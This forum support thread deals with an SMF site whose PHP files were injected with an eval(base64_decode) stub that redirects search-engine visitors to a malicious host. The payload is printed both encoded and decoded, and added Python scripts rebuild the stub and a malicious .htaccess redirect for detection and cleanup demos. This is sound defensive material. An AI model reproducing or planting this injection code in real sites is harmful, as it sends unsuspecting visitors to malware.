Simple Machines Community Forum

SMF Support => SMF 2.0.x Support => Topic started by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 01:08:46 AM

Title: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 01:08:46 AM
All my files on the server/host are infected by something I would like to think of as a virus. I know this could be the server/host's problem and have contacted them. Still awaiting their reply on this.

This code was injected to all my SMF files:

Code: [Select]
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZG5zLWRucy5kbnMtZG5zLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

What can cause such an injection to all SMF files? How to stop it? Please advise.
Title: Re: All files been infected by virus?
Post by: Colin on October 12, 2012, 01:15:45 AM
Sorry to hear that. Take a look at just a few:

http://www.simplemachines.org/community/index.php?topic=480455.0
http://www.simplemachines.org/community/index.php?topic=480600.0
http://www.simplemachines.org/community/index.php?topic=469001.0

Here are the docs:
http://wiki.simplemachines.org/smf/How_to_check_permissions
http://wiki.simplemachines.org/smf/How_do_I_make_my_forum_safer_against_hacker_attacks


Here is the code that is being injected:
Code: [Select]
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://dns-dns.dns-dns.com/");
exit();
}
}
}
}
}
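Added example, not code from any post in this thread: a small Python script that pulls the base64 blob out of a stub like the one pasted above, decodes it (following nested layers, which this sample does not have), reads the redirect target out of the decoded PHP, and re-implements the payload's decision logic so you can see exactly which visitors get sent away. Two things worth seeing in code: the stub checks headers_sent() first, so it only works when it runs before any output, which is why it is prepended to the very top of every file; and the last check, `!stristr($referer,"cache") or !stristr($referer,"inurl")`, is an `or` of two negations, so it only suppresses the redirect when the referer contains both words. A visitor with no Referer at all (typed URL, bookmark) is never redirected, which is why the site looks fine to its own admin. The sample PHP file and payload are constructed for the example; the referer list and the target URL are copied from the decoded code above.

```python
"""Decode an eval(base64_decode(...)) stub and emulate its redirect decision.

Added example: the sample file is constructed; the referer list and target URL
come from the decoded payload posted earlier in this thread."""
import base64
import re
from typing import Optional

# The injected one-liner, with the base64 blob captured.
STUB_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?')
LOCATION_RE = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\']+)["\']')


def decode_stubs(php_source: str, max_depth: int = 5) -> list[str]:
    """Decoded payload of every stub in php_source. Real samples are sometimes
    wrapped several times, so each decoded payload is searched again, up to max_depth."""
    found = []
    for match in STUB_RE.finditer(php_source):
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except ValueError as exc:          # binascii.Error is a ValueError
            found.append(f"<undecodable: {exc}>")
            continue
        found.append(decoded)
        if max_depth > 0:
            found.extend(decode_stubs(decoded, max_depth - 1))
    return found


def redirect_target(decoded_payload: str) -> Optional[str]:
    """The URL in header("Location: ..."): the indicator to block and to grep logs for."""
    match = LOCATION_RE.search(decoded_payload)
    return match.group(1) if match else None


def wrap_in_stub(payload: str) -> str:
    """Build the obfuscated one-liner from plain PHP (used here only to construct samples)."""
    return 'eval(base64_decode("' + base64.b64encode(payload.encode()).decode() + '"));'


# Decision logic of the payload, transcribed from the decoded PHP above.
# stristr() is case-insensitive; the two preg_match() patterns are not.
REFERER_SUBSTRINGS = ("yahoo", "bing", "rambler", "gogo", "live.com", "aport", "nigma",
                      "webalta", "begun.ru", "stumbleupon.com", "bit.ly", "tinyurl.com",
                      "myspace.com", "facebook.com", "aol.com")
REFERER_PATTERNS = (re.compile(r"yandex\.ru/yandsearch\?(.*?)&lr="),
                    re.compile(r"google\.(.*?)/url\?sa"))
REDIRECT_TARGET = "http://dns-dns.dns-dns.com/"


def would_redirect(referer: str, user_agent: str) -> bool:
    """Does a visitor with this Referer and User-Agent get sent to REDIRECT_TARGET?"""
    if not user_agent:                                  # if ($uag)
        return False
    ua = user_agent.lower()
    if "msie 7.0" in ua or "msie 6.0" in ua:            # IE6 and IE7 are skipped
        return False
    ref = referer.lower()
    came_from_search = (any(s in ref for s in REFERER_SUBSTRINGS)
                        or any(p.search(referer) for p in REFERER_PATTERNS))
    if not came_from_search:    # typed URLs and bookmarks carry no Referer: the admin never sees it
        return False
    # (!stristr(cache) or !stristr(inurl)) is true unless the referer holds BOTH words.
    return not ("cache" in ref and "inurl" in ref)


# Constructed sample: a stub prepended to a PHP file, as in this thread.
SAMPLE_PAYLOAD = ('error_reporting(0);\r\nif (!headers_sent()) {\r\n'
                  '  header("Location: http://dns-dns.dns-dns.com/");\r\n  exit();\r\n}')
SAMPLE_PHP = ("<?php " + wrap_in_stub(SAMPLE_PAYLOAD)
              + "?><?php\n// original SMF index.php would follow here\n")


if __name__ == "__main__":
    for payload in decode_stubs(SAMPLE_PHP):
        print("redirects to:", redirect_target(payload))
    for ref, ua in (("", "Firefox/15.0"),
                    ("http://www.google.com/url?sa=t&q=smf", "Firefox/15.0"),
                    ("http://www.google.com/url?sa=t&q=smf", "MSIE 7.0")):
        print(repr(ref), ua, "->", would_redirect(ref, ua))
```

Run it against a real file by passing its contents to decode_stubs(); if the decoded text is itself another eval(base64_decode(...)), the recursion unwraps that too. would_redirect() is also a quick way to reproduce the symptom for a host's support ticket: send a request with a Google Referer and a non-IE User-Agent and you get the 302 that a direct request never shows.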
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 01:26:29 AM
Check out following:

* http://sitecheck.sucuri.net/results/ahrasis.com/
* http://labs.sucuri.net/db/malware/malware-entry-mwblacklisted35
* http://blog.sucuri.net/2012/03/conditional-redirect-malware-decoded-evalbase64_decode-example.html

I think you need to clean this type of malware manually. If you have a clean backup, then restore your forum from that.

Also,

1. Change FTP/cPanel/WHM passwords
2. Check your .htaccess file for malicious code
3. Scan your PC
4. Open a support ticket with your web host and ask them whether they can do anything about this. Sometimes, because of a weak server security configuration, the attacker gains access and infects many websites.

Hope everything is going to be fine soon :)
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 01:38:13 AM
Here is the code that is being injected:
Code: [Select]
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://dns-dns.dns-dns.com/");
exit();
}
}
}
}
}

Very Nice

Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 01:50:56 AM
The site downloads Trojan program: HEUR:Trojan.Script.Iframer

The malware goes directly to the browser cache folder and this way it infects the machine
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 02:24:57 AM
I will make a more thorough check. Right now, all I know is that it has infected or been injected into almost all files on the server/host. My password was rather long and tightly/highly secured. Some claim it is a vulnerability in the software, which is only SMF and a few mods (not more than 15). This was not there yesterday. So there is no possibility that any of these mods could have been the cause.

On whether the browser, if infected with a virus, can cause all this, I would say it could. But the browsers I am using are FF15 and Chrome 22.0.1229.94, which is the latest. Could this be caused by Firebug with all the available options (including the alpha and beta) installed?
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 02:49:56 AM

On whether the browser, if infected with a virus, can cause all this, I would say it could. But the browsers I am using are FF15 and Chrome 22.0.1229.94, which is the latest. Could this be caused by Firebug with all the available options (including the alpha and beta) installed?

Have you scanned all your machines using which you do all types of Admin work for your forum?

Try scanning your full PC with Kaspersky and Malwarebytes Anti-Malware, with the latest definitions. If the malware has blocked security software from performing tasks, then you need to use Kaspersky Rescue Disk.

Some properties of above trojan are as follows:

Quote
Slow down your PC speed notably.
Add other dangerous Trojan or Spyware to your system secretly.
Allow the hacker to access your entire system.
Collect all your personal information and transfer to a remote hacker.
Destroy critical system files and make PC unstable.

No matter how strong your password was, you need to change it.
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 02:54:10 AM
Have you scanned all your machines using which you do all types of Admin work for your forum?
Am doing it as we speak.
No matter how strong your password was, you need to change it.
I am changing that too. Will schedule to do that every month from now on.

So far I have cleaned most of the files on my server/host. I just have to double check to make sure they are all clean. I guess the attack came from one of my Joomla sites. Sigh...
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 03:00:41 AM
One very important thing:

Disable your forum unless everything is sorted.

That referrer-based malware will be downloaded to every visitor's computer. The malware goes directly to the browser cache.

I also got infected while testing for malware on your website

You need to make your forum Offline

Sorry, but it's necessary!
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 03:05:43 AM
That's a good idea. But I believe my server/host has restored all the clean files back to their places.
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 03:13:19 AM
That's a good idea. But I believe my server/host has restored all the clean files back to their places.


As of now, I am also scanning my PC once again :(

Damn!

Edit:

I use Chrome and the malware was present in this folder: C:\Users\Mrinmay\AppData\Local\Google\Chrome\User Data\Default\
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 03:18:14 AM
Sorry for that mrintech. As of now I am setting my CloudFlare to "I'm under attack" mode. I hope this will help protecting all my files/sites on my server/host.
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 03:25:31 AM
Sorry for that mrintech. As of now I am setting my CloudFlare to "I'm under attack" mode. I hope this will help protecting all my files/sites on my server/host.


No worries, I know how to deal with malware on my PC. It takes 3-4 hours to scan my PC as I have lots and lots of files, and this annoys me the most.

Hope everything is fine with your websites too :)
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 03:29:39 AM
They seem fine for now. I was wrong; I'm still facing this problem.  :-[
Title: Re: All files been infected by virus?
Post by: kat on October 12, 2012, 06:48:19 AM
This is a damned good thread, about this:

http://wordpress.org/support/topic/evalbase64_decode-hacked

I have to admit that, if I was in your place (I was, quite a while back), I might be tempted to replace all of the files with virgin files from the large upgrade archive.

(When I did mine, I went through every file, manually, removing the code. Defining a macro sped that up, a lot.)

But, as you intimated, your Wordpress files could be infected, too.
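Added example, not code from any post in this thread: a Python script that does, over a whole web root at once, what mrintech's checklist and kat's two approaches describe by hand. It (1) scans every .php file for the eval(base64_decode) stub and every .htaccess for a referer-conditional RewriteRule redirect, which is the .htaccess variant of the same trick; (2) strips the stubs in place, copying each infected original to a quarantine directory outside the web root first; and (3) compares the result against a SHA-256 manifest built from a clean, unpacked copy of the same SMF release, which is kat's "virgin files" idea turned into a check. The verify step matters more than the strip step: a file that is not in the release at all (the "unexpected" list) is exactly where a dropped backdoor lives, and a signature scan for the stub will never find it. The directory tree, the stand-in SMF files, the backdoor stand-in and the .htaccess are all constructed inside run_demo() in a temporary directory; on a real host you would point build_manifest() at the unpacked upgrade archive and the other functions at your document root.

```python
"""Find and strip eval(base64_decode) stubs across a web root, flag referer-conditional
.htaccess redirects, and verify the result against a manifest of a clean release.
Added example; everything it touches is constructed inside run_demo()."""
import base64
import hashlib
import re
import shutil
import tempfile
from pathlib import Path

B64 = r'["\'][A-Za-z0-9+/=]+["\']'
# The injected line, either in its own <?php ... ?> block (as when prepended) or bare.
STUB_RE = re.compile(
    r'<\?php\s*eval\s*\(\s*base64_decode\s*\(\s*' + B64 + r'\s*\)\s*\)\s*;?\s*\?>\s*'
    r'|eval\s*\(\s*base64_decode\s*\(\s*' + B64 + r'\s*\)\s*\)\s*;?')
# Same trick in .htaccess: RewriteCond on the referer, then a RewriteRule with the R flag.
HTACCESS_RE = re.compile(
    r'RewriteCond\s+%\{HTTP_REFERER\}[^\n]*\n(?:\s*RewriteCond[^\n]*\n)*\s*RewriteRule[^\n]*\[[^\]]*R',
    re.IGNORECASE)

def strip_stubs(source: str) -> tuple[str, int]:
    """Remove every stub from PHP source text; return (cleaned_text, number_removed)."""
    return STUB_RE.subn("", source)

def files_under(root: Path) -> dict[str, Path]:
    """Relative POSIX path -> Path for every regular file below root."""
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}

def build_manifest(clean_root: Path) -> dict[str, str]:
    """SHA-256 of every file in a clean, unpacked release (e.g. the SMF upgrade archive)."""
    return {rel: hashlib.sha256(p.read_bytes()).hexdigest() for rel, p in files_under(clean_root).items()}

def scan_tree(root: Path) -> dict[str, str]:
    """Report files carrying a stub or a referer-conditional redirect."""
    findings = {}
    for rel, p in files_under(root).items():
        text = p.read_bytes().decode("latin-1")      # latin-1: every byte round-trips unchanged
        if p.suffix == ".php" and STUB_RE.search(text):
            findings[rel] = "eval(base64_decode) stub"
        elif p.name == ".htaccess" and HTACCESS_RE.search(text):
            findings[rel] = "referer-conditional redirect"
    return findings

def clean_tree(root: Path, quarantine: Path) -> int:
    """Strip stubs in place, copying each infected original under quarantine first."""
    removed = 0
    for rel, p in files_under(root).items():
        if p.suffix != ".php":
            continue
        cleaned, n = strip_stubs(p.read_bytes().decode("latin-1"))
        if n:
            (quarantine / rel).parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(p, quarantine / rel)        # keep the evidence, outside the web root
            p.write_bytes(cleaned.encode("latin-1"))
            removed += n
    return removed

def verify_tree(root: Path, manifest: dict[str, str]) -> dict[str, list[str]]:
    """Diff the web root against the clean manifest; read 'unexpected' first."""
    present = build_manifest(root)
    return {"modified": sorted(k for k in manifest if k in present and present[k] != manifest[k]),
            "missing": sorted(k for k in manifest if k not in present),
            "unexpected": sorted(k for k in present if k not in manifest)}

# Constructed demo data: stand-ins for clean SMF files, the stub, and a bad .htaccess.
CLEAN_FILES = {
    "index.php": "<?php\n// constructed stand-in for SMF's index.php\necho 'forum';\n",
    "Sources/Load.php": "<?php\n// constructed stand-in for Sources/Load.php\nfunction loadSettings() {}\n",
}
STUB = ('<?php eval(base64_decode("' + base64.b64encode(
    b'error_reporting(0);header("Location: http://dns-dns.dns-dns.com/");exit();').decode() + '"));?>')
BAD_HTACCESS = ("RewriteEngine On\nRewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]\n"
                "RewriteRule .* http://dns-dns.dns-dns.com/ [R=302,L]\n")

def write_files(root: Path, files: dict[str, str]) -> None:
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(body.encode("utf-8"))

def run_demo() -> dict:
    """Build a clean tree and an infected copy in a temp dir; scan, clean, verify."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, site, quarantine = Path(tmp, "clean"), Path(tmp, "site"), Path(tmp, "quarantine")
        write_files(clean, CLEAN_FILES)
        manifest = build_manifest(clean)
        infected = {rel: STUB + body for rel, body in CLEAN_FILES.items()}  # stub on every file
        infected["Themes/default/images/shell.php"] = "<?php // constructed stand-in for a dropped backdoor ?>\n"
        infected[".htaccess"] = BAD_HTACCESS
        write_files(site, infected)
        findings = scan_tree(site)              # the backdoor stand-in is NOT found here ...
        removed = clean_tree(site, quarantine)
        report = verify_tree(site, manifest)    # ... but it shows up as 'unexpected' here
        return {"findings": findings, "removed": removed,
                "quarantined": sorted(files_under(quarantine)), **report}

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Files are read and written as latin-1 bytes so that a Settings.php with an odd encoding comes back byte-identical apart from the removed stub; that is what makes the post-clean "modified" list meaningful. Anything still listed under "modified" after cleaning (a legitimately edited Settings.php aside) deserves a manual diff, and anything under "unexpected" deserves a look before the forum goes back online.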
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 14, 2012, 12:22:12 PM
I only have Joomla & SMF. It is easy for me to deal with SMF; I have various ways of doing it. But I have a problem with Joomla. I am planning to separate Joomla onto a different host/server in the future. One host, one software. Easy to find which one is hacked/compromised in the future. Having said that, hmmm... I will wait and see the full report later.
Title: Re: All files been infected by virus?
Post by: kat on October 14, 2012, 03:46:14 PM
Sorry, I meant Joomla. I was working on two topics and lost my thread, a bit.

Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 15, 2012, 11:14:54 PM
Sorry, I meant Joomla. I was working on two topics and lost my thread, a bit.
Ah... It's nothing. I just finished reinstalling all backups. Site should be ok now...
Title: Re: All files been infected by virus?
Post by: XHIBIT911 on October 16, 2012, 01:37:32 AM
Yup, I see you've fallen prey to the Blackhole exploit as well. That's a nasty virus if I've ever seen one, and it hides in dbase code.
Title: Re: All files been infected by virus?
Post by: mrintech on October 16, 2012, 01:46:25 AM
I can see your site is now clean: http://sitecheck.sucuri.net/results/ahrasis.com/

Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 16, 2012, 02:33:01 AM
Thanks. That site is good at detecting viruses. But I am still puzzled, actually.

On one of my sites under sch.my (the Malaysia School Domain project site), I deleted all files and reinstalled. But then I still had a problem logging in. When I scanned, it said:

Sitecheck Results

web site:    alumni.sch.my
status:    Site with warnings
web trust:          Not Blacklisted

Security warning in the URL:
http://alumni.sch.my/index.php?PHPSESSID=ktmen54tridjrrbbsp568ln0m7&action=register

So the virus is still there. Somewhere, somehow. It couldn't be inside my PC as I did a full scan before I proceeded. Any ideas/suggestions?
Title: Re: All files been infected by virus?
Post by: mrintech on October 16, 2012, 02:47:43 AM
I don't see any warning status: http://sitecheck.sucuri.net/results/alumni.sch.my and http://sitecheck.sucuri.net/results/sch.my

Sometimes the results are cached on that site; you need to re-scan the site after some hours.
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 16, 2012, 03:28:15 AM
That is because I removed all its files. I am restoring from fresh SMF files now.